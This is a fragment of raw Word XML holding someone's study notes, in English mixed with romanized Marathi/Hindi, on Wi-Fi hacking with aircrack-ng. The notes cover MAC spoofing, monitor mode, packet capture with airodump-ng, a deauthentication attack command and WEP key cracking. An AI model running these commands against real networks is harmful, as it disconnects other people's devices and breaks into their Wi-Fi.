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5474" w14:textId="1B98FE7B" w:rsidR="006D5E8C" w:rsidRDefault="00EB2B28">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6661A03F" w14:textId="1E34ED4B" w:rsidR="00EB2B28" w:rsidRDefault="00EB2B28">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CEFD08" w14:textId="4563E8D3" w:rsidR="00EB2B28" w:rsidRDefault="00EB2B28">
      <w:r>
        <w:t>Cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A860C4" w14:textId="567A36E5" w:rsidR="00EB2B28" w:rsidRDefault="00EB2B28">
      <w:r>
        <w:t>Man ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FFEB93" w14:textId="5B293E8A" w:rsidR="00EB2B28" w:rsidRDefault="00EB2B28">
      <w:r>
        <w:t>Apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F05A9" w14:textId="0F0904D2" w:rsidR="00EB2B28" w:rsidRDefault="00EB2B28">
      <w:r>
        <w:t xml:space="preserve">Apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>terminor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32D92ADB" w14:textId="77777777" w:rsidR="006C74A6" w:rsidRDefault="006C74A6"/>
    <w:p w14:paraId="5862962F" w14:textId="77777777" w:rsidR="006C74A6" w:rsidRDefault="006C74A6"/>
    <w:p w14:paraId="7D929ABD" w14:textId="5FCB8C60" w:rsidR="006C74A6" w:rsidRPr="006C74A6" w:rsidRDefault="006C74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Changing mac address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62FFCC" w14:textId="7139A804" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:r w:rsidRPr="00E67D7B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BEF83D5" wp14:editId="073F5C33">
            <wp:extent cx="5731510" cy="1902460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="6204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96D4" w14:textId="6A62EC90" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:r>
        <w:t xml:space="preserve">Je </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aplyala</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mac address change </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>karaycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ahhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tyacha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apan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disable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>karyacha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nantr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jithe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mac address </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ahe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tyala</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hawrware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ne jo new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wala</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mac address </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ahe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change </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>karaycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C4AACBB" w14:textId="2753CC58" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nantr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parat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enable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decha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BEA88" w14:textId="17422705" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:r>
        <w:t>Ipconfig wlan0 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E0300" w14:textId="77777777" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B"/>
    <w:p w14:paraId="5E17D955" w14:textId="77777777" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B"/>
    <w:p w14:paraId="23CB7654" w14:textId="6A918181" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3348DD33" w14:textId="518ABB3E" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:r>
        <w:t xml:space="preserve">To see </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thewireless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connection only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348D7088" w14:textId="77777777" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B"/>
    <w:p w14:paraId="245139EE" w14:textId="0F8374EB" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:r w:rsidRPr="00E67D7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>manage mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00E67D7B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>– default mode ..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it will only capture the packet that has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>distination</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mac address of that device </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D100A8" w14:textId="77777777" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B"/>
    <w:p w14:paraId="5F08EE0E" w14:textId="67D07F33" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E67D7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor mode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to see the packet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>transferr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over all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> network we have to make mode to monitor mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223F1DE" w14:textId="579F3B30" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>this is how it is done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB797DF" w14:textId="3A7BC915" w:rsidR="00E67D7B" w:rsidRDefault="00E67D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 wlan0 down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD3E1C" w14:textId="29217CA1" w:rsidR="00E67D7B" w:rsidRDefault="00E67D7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then kill any command that is going down to avoid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conlission</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="782AC7D8" w14:textId="658DD82D" w:rsidR="00E67D7B" w:rsidRDefault="006C74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airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-ng check kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52D126" w14:textId="1F836DDE" w:rsidR="006C74A6" w:rsidRDefault="006C74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iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> wlan0 mode monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A2B33" w14:textId="2CE2DEFB" w:rsidR="006C74A6" w:rsidRDefault="006C74A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iwconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> wlan0 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A618BA6" w14:textId="77777777" w:rsidR="005D62AB" w:rsidRPr="005D62AB" w:rsidRDefault="005D62AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4377F102" w14:textId="7F8F12F8" w:rsidR="005D62AB" w:rsidRPr="005D62AB" w:rsidRDefault="005D62AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D62AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">packet sniffing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256BAB14" w14:textId="001FD948" w:rsidR="005D62AB" w:rsidRDefault="005D62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airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-ng wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A4E59" w14:textId="0C957872" w:rsidR="005D62AB" w:rsidRDefault="005D62AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ESSID – connection near by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F70D3E" w14:textId="5DBD0A1B" w:rsidR="005D62AB" w:rsidRDefault="005D62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Pwr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – power high better</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5D1C9" w14:textId="337E28EC" w:rsidR="005D62AB" w:rsidRDefault="005D62AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ENC </w:t>
      </w:r>
      <w:r w:rsidR="00091BA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91BA5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CAEE6" w14:textId="77777777" w:rsidR="00091BA5" w:rsidRDefault="00091BA5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E96EE5E" w14:textId="2ED93342" w:rsidR="00091BA5" w:rsidRDefault="00091BA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Airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-ng –band a(supports 5 g) wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B3D19" w14:textId="5013EDAE" w:rsidR="00091BA5" w:rsidRDefault="00091BA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605448" w14:textId="02A3306D" w:rsidR="00326C60" w:rsidRDefault="00326C60" w:rsidP="00326C6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Airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-ng –band </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>abg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB6B445" w14:textId="224E6252" w:rsidR="00326C60" w:rsidRDefault="00326C60" w:rsidP="00326C60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">To see the 2.4 and 5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> band network and clients connected to that network </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E10D7" w14:textId="2A10FE4B" w:rsidR="00326C60" w:rsidRDefault="00326C60" w:rsidP="00326C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26C60">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F85C7C" wp14:editId="49456CB5">
            <wp:extent cx="5731510" cy="499745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="116460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3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B7FE" w14:textId="77777777" w:rsidR="005D62AB" w:rsidRDefault="005D62AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078B4254" w14:textId="77777777" w:rsidR="00E67D7B" w:rsidRPr="00E67D7B" w:rsidRDefault="00E67D7B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B38DEB" w14:textId="34DF9989" w:rsidR="00E67D7B" w:rsidRDefault="00867E3B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> **mac address**  --channel **number** --write **filename** wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998EB8F" w14:textId="70948FCB" w:rsidR="00867E3B" w:rsidRDefault="00867E3B">
      <w:r>
        <w:t>.cap file is main it will contain all the data we gathered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6B4ED" w14:textId="1ACCAB4A" w:rsidR="00867E3B" w:rsidRDefault="00867E3B">
      <w:r>
        <w:t xml:space="preserve">Then we open .cap file in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37893F1E" w14:textId="77777777" w:rsidR="00867E3B" w:rsidRDefault="00867E3B"/>
    <w:p w14:paraId="0853AE24" w14:textId="77777777" w:rsidR="004E0C9C" w:rsidRDefault="004E0C9C"/>
    <w:p w14:paraId="41A283F3" w14:textId="4AC24D9D" w:rsidR="004E0C9C" w:rsidRDefault="004E0C9C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pahile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> router la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> disconnect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>karaycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ,…</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nantr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75911D9B" w14:textId="199403E1" w:rsidR="004E0C9C" w:rsidRDefault="004E0C9C">
      <w:r>
        <w:t xml:space="preserve">Mac address router cha change </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>karaycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> anni mag jo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dusra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> client connect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ahe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tyaala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apan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> disconnect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takayycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B5D5A51" w14:textId="77777777" w:rsidR="004E0C9C" w:rsidRDefault="004E0C9C"/>
    <w:p w14:paraId="1A5368F7" w14:textId="7DC44A54" w:rsidR="004E0C9C" w:rsidRDefault="004E0C9C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Deauthetication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA6518B" w14:textId="1314F170" w:rsidR="004E0C9C" w:rsidRDefault="004E0C9C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {large number}  -a {mac address of router} -c {mac address of client} wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCA272" w14:textId="77777777" w:rsidR="00867E3B" w:rsidRDefault="00867E3B"/>
    <w:p w14:paraId="0C2C04BC" w14:textId="7CB39928" w:rsidR="004E0C9C" w:rsidRDefault="004E0C9C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">-c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bolle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disconnect the address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705111F" w14:textId="6563183C" w:rsidR="004E0C9C" w:rsidRDefault="004E0C9C">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abovr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> may fail if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ng is running against the target network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E793AA" w14:textId="3A061EAB" w:rsidR="00843DF2" w:rsidRDefault="00843DF2">
      <w:r>
        <w:t xml:space="preserve">Manje 2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ghA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HI CMD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sobat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runnhoyla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pahijel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trch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hot </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2320B186" w14:textId="353BB39E" w:rsidR="00843DF2" w:rsidRDefault="00843DF2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Te</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> network la disconnect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takta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="508AFEE6" w14:textId="28DBA409" w:rsidR="00843DF2" w:rsidRDefault="00843DF2">
      <w:r>
        <w:t>Wlan0- interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108E93A" w14:textId="77777777" w:rsidR="00843DF2" w:rsidRDefault="00843DF2"/>
    <w:p w14:paraId="7EF315C7" w14:textId="77777777" w:rsidR="00843DF2" w:rsidRDefault="00843DF2"/>
    <w:p w14:paraId="25478917" w14:textId="422A077A" w:rsidR="00843DF2" w:rsidRDefault="00843DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>WEP – wired equivalent privacy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499598AD" w14:textId="559E9A5D" w:rsidR="00843DF2" w:rsidRDefault="00A107E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C92CE5D" w14:textId="392D2524" w:rsidR="00A107E0" w:rsidRDefault="00A107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Airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> ………--channel …….-- write filename interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB71921" w14:textId="770579E3" w:rsidR="00A107E0" w:rsidRDefault="00A107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Nextwindow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madhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75F64803" w14:textId="40DC6304" w:rsidR="00A107E0" w:rsidRDefault="00A107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 xml:space="preserve">-ng </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>filename.cap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DFF75DC" w14:textId="22F2896D" w:rsidR="00A107E0" w:rsidRDefault="00A107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Key found(semi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>collen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takaycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86DDE9" w14:textId="77777777" w:rsidR="00A107E0" w:rsidRDefault="00A107E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3763412D" w14:textId="6C3B1F31" w:rsidR="00A107E0" w:rsidRDefault="00613A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Yayhcch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kadhaycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> …jo ki active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nasel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34C16A4A" w14:textId="14A26532" w:rsidR="00613AB2" w:rsidRDefault="00613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Fake authentication attack</w:t>
      </w:r>
    </w:p>
